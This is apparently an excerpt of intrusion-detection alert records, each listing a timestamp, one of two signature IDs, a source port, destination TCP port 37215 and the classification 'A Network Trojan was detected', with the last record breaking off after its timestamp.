          Timestamp:06/08/24-15:05:29.044754
          SID:2835222
          Source Port:39462
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.670205
          SID:2835222
          Source Port:33486
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.670097
          SID:2829579
          Source Port:45474
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.463902
          SID:2829579
          Source Port:45098
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.175729
          SID:2829579
          Source Port:53384
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.161679
          SID:2829579
          Source Port:54162
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.111879
          SID:2835222
          Source Port:41404
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.237465
          SID:2835222
          Source Port:35284
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.705770
          SID:2835222
          Source Port:54452
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.163176
          SID:2829579
          Source Port:49018
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.509993
          SID:2835222
          Source Port:35620
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.891776
          SID:2829579
          Source Port:53252
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.512142
          SID:2829579
          Source Port:45424
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.708176
          SID:2829579
          Source Port:40414
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.832268
          SID:2835222
          Source Port:37546
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.463381
          SID:2829579
          Source Port:39098
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.739159
          SID:2835222
          Source Port:35520
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.440727
          SID:2835222
          Source Port:39134
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.857180
          SID:2835222
          Source Port:43218
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.806754
          SID:2835222
          Source Port:36806
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.832959
          SID:2835222
          Source Port:49418
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.396852
          SID:2829579
          Source Port:53742
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.510186
          SID:2835222
          Source Port:36482
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.295380
          SID:2835222
          Source Port:34894
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.516730
          SID:2829579
          Source Port:50740
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.791617
          SID:2835222
          Source Port:38854
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.042706
          SID:2835222
          Source Port:48272
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.733828
          SID:2835222
          Source Port:52942
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.175087
          SID:2829579
          Source Port:58600
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.175576
          SID:2829579
          Source Port:44852
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.233524
          SID:2835222
          Source Port:40504
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.806139
          SID:2829579
          Source Port:44030
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.894823
          SID:2835222
          Source Port:45580
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.518446
          SID:2829579
          Source Port:42528
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.276589
          SID:2835222
          Source Port:51438
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.672407
          SID:2829579
          Source Port:58372
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.168362
          SID:2835222
          Source Port:59024
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.178959
          SID:2829579
          Source Port:53902
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.112361
          SID:2835222
          Source Port:36546
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.668089
          SID:2829579
          Source Port:38996
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.449793
          SID:2829579
          Source Port:36856
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.744469
          SID:2829579
          Source Port:43074
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.172940
          SID:2835222
          Source Port:44598
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.781810
          SID:2829579
          Source Port:52808
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.606376
          SID:2829579
          Source Port:41110
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.748134
          SID:2835222
          Source Port:42522
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.070974
          SID:2829579
          Source Port:42180
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.821857
          SID:2829579
          Source Port:52876
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.795102
          SID:2829579
          Source Port:49068
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.275323
          SID:2829579
          Source Port:59912
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.469156
          SID:2829579
          Source Port:49418
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.110246
          SID:2835222
          Source Port:43302
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.891838
          SID:2835222
          Source Port:53330
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.111101
          SID:2835222
          Source Port:49414
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.107561
          SID:2835222
          Source Port:50030
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.169348
          SID:2829579
          Source Port:38058
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.157840
          SID:2829579
          Source Port:58708
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.731112
          SID:2829579
          Source Port:51642
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.673611
          SID:2835222
          Source Port:37828
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.861418
          SID:2835222
          Source Port:51550
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.302556
          SID:2835222
          Source Port:37842
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.239058
          SID:2829579
          Source Port:54762
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.162551
          SID:2829579
          Source Port:60516
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.829860
          SID:2829579
          Source Port:44872
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.672624
          SID:2829579
          Source Port:56364
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.786725
          SID:2835222
          Source Port:41200
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.857599
          SID:2829579
          Source Port:51712
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.781196
          SID:2829579
          Source Port:41132
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.266008
          SID:2829579
          Source Port:38792
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.731745
          SID:2829579
          Source Port:45372
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.262235
          SID:2829579
          Source Port:50738
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.130184
          SID:2835222
          Source Port:51920
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.782214
          SID:2829579
          Source Port:36338
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.354407
          SID:2829579
          Source Port:58116
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.042137
          SID:2829579
          Source Port:38790
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.107736
          SID:2835222
          Source Port:57950
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.730835
          SID:2835222
          Source Port:60066
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.601683
          SID:2829579
          Source Port:44740
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.510287
          SID:2835222
          Source Port:53142
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.109265
          SID:2835222
          Source Port:51402
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.015771
          SID:2829579
          Source Port:55786
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.511035
          SID:2835222
          Source Port:42572
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.158611
          SID:2835222
          Source Port:53746
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.110209
          SID:2835222
          Source Port:39296
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.554685
          SID:2835222
          Source Port:36980
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.797689
          SID:2829579
          Source Port:48880
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.807299
          SID:2835222
          Source Port:36020
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.115305
          SID:2835222
          Source Port:46360
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.741179
          SID:2829579
          Source Port:33610
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.734638
          SID:2835222
          Source Port:53146
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.056370
          SID:2835222
          Source Port:40568
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.015052
          SID:2835222
          Source Port:57508
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.508488
          SID:2829579
          Source Port:57608
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.306346
          SID:2829579
          Source Port:60424
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.378267
          SID:2835222
          Source Port:57986
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.510022
          SID:2835222
          Source Port:47316
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.598638
          SID:2829579
          Source Port:48872
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.191773
          SID:2829579
          Source Port:40012
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.136322
          SID:2835222
          Source Port:51174
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.174596
          SID:2835222
          Source Port:45966
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.449535
          SID:2835222
          Source Port:52662
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.020259
          SID:2829579
          Source Port:32816
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.306555
          SID:2835222
          Source Port:59076
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.447229
          SID:2829579
          Source Port:48498
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.843009
          SID:2835222
          Source Port:54888
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.353487
          SID:2829579
          Source Port:53756
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.107980
          SID:2835222
          Source Port:60986
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.547277
          SID:2835222
          Source Port:48692
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.811811
          SID:2835222
          Source Port:38760
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.822276
          SID:2829579
          Source Port:34554
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.257296
          SID:2835222
          Source Port:43868
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.153858
          SID:2829579
          Source Port:48542
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.403545
          SID:2835222
          Source Port:36718
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.262515
          SID:2835222
          Source Port:34096
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.352930
          SID:2835222
          Source Port:35950
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.671345
          SID:2835222
          Source Port:36068
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.354989
          SID:2835222
          Source Port:46064
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.460900
          SID:2829579
          Source Port:57224
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.729260
          SID:2829579
          Source Port:42762
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.709398
          SID:2835222
          Source Port:46336
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.177917
          SID:2829579
          Source Port:50732
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.152773
          SID:2835222
          Source Port:49766
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.162653
          SID:2835222
          Source Port:51130
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.742128
          SID:2835222
          Source Port:53562
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.239855
          SID:2835222
          Source Port:42394
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.354160
          SID:2835222
          Source Port:53218
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.243071
          SID:2835222
          Source Port:40278
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.241241
          SID:2835222
          Source Port:39532
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.155974
          SID:2835222
          Source Port:47052
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.059494
          SID:2829579
          Source Port:58692
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.039840
          SID:2829579
          Source Port:49758
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.175957
          SID:2835222
          Source Port:47634
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.896079
          SID:2829579
          Source Port:51524
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.782811
          SID:2829579
          Source Port:44048
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.150333
          SID:2829579
          Source Port:46044
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.099448
          SID:2835222
          Source Port:40186
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.730884
          SID:2835222
          Source Port:57398
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.152454
          SID:2835222
          Source Port:46346
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.108700
          SID:2829579
          Source Port:34774
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.788784
          SID:2829579
          Source Port:51446
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.703898
          SID:2835222
          Source Port:52028
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.810614
          SID:2835222
          Source Port:37122
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.911891
          SID:2829579
          Source Port:53062
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.801199
          SID:2835222
          Source Port:42076
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.188798
          SID:2835222
          Source Port:46014
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.470312
          SID:2835222
          Source Port:56158
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.019024
          SID:2835222
          Source Port:56846
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.395909
          SID:2829579
          Source Port:57430
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.782232
          SID:2835222
          Source Port:38498
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.274745
          SID:2835222
          Source Port:52080
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.109160
          SID:2829579
          Source Port:44340
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.155608
          SID:2835222
          Source Port:46674
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.158879
          SID:2829579
          Source Port:52372
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.911728
          SID:2829579
          Source Port:44752
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.748097
          SID:2835222
          Source Port:54604
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.825039
          SID:2829579
          Source Port:42308
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.081717
          SID:2829579
          Source Port:48680
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.467157
          SID:2835222
          Source Port:43676
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.601208
          SID:2829579
          Source Port:57182
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.673043
          SID:2829579
          Source Port:43718
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.114617
          SID:2829579
          Source Port:45922
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.445903
          SID:2829579
          Source Port:46530
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.600974
          SID:2829579
          Source Port:33118
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.513374
          SID:2829579
          Source Port:54634
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.512041
          SID:2835222
          Source Port:57128
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.787993
          SID:2829579
          Source Port:37108
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.040512
          SID:2835222
          Source Port:50662
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.788501
          SID:2829579
          Source Port:50558
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.275685
          SID:2835222
          Source Port:59876
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.044953
          SID:2835222
          Source Port:53500
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.236978
          SID:2829579
          Source Port:38732
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.157930
          SID:2835222
          Source Port:53838
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.734513
          SID:2835222
          Source Port:41280
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.672275
          SID:2829579
          Source Port:37526
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.862286
          SID:2829579
          Source Port:38570
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.842371
          SID:2829579
          Source Port:39474
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.550647
          SID:2835222
          Source Port:53820
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.161179
          SID:2835222
          Source Port:36280
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.732446
          SID:2835222
          Source Port:39520
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.107297
          SID:2829579
          Source Port:47792
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.892461
          SID:2835222
          Source Port:39418
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.180273
          SID:2835222
          Source Port:45954
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.517981
          SID:2835222
          Source Port:38554
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.262496
          SID:2835222
          Source Port:53802
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.152604
          SID:2835222
          Source Port:35314
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.128121
          SID:2835222
          Source Port:39598
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.135408
          SID:2829579
          Source Port:46908
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.017048
          SID:2835222
          Source Port:54978
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.238111
          SID:2829579
          Source Port:43726
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.898003
          SID:2835222
          Source Port:34086
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.599200
          SID:2835222
          Source Port:49634
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.460882
          SID:2829579
          Source Port:33744
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.164323
          SID:2829579
          Source Port:53958
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.604093
          SID:2835222
          Source Port:39782
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.020963
          SID:2829579
          Source Port:38404
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.512313
          SID:2829579
          Source Port:35886
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.745753
          SID:2835222
          Source Port:39166
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.158412
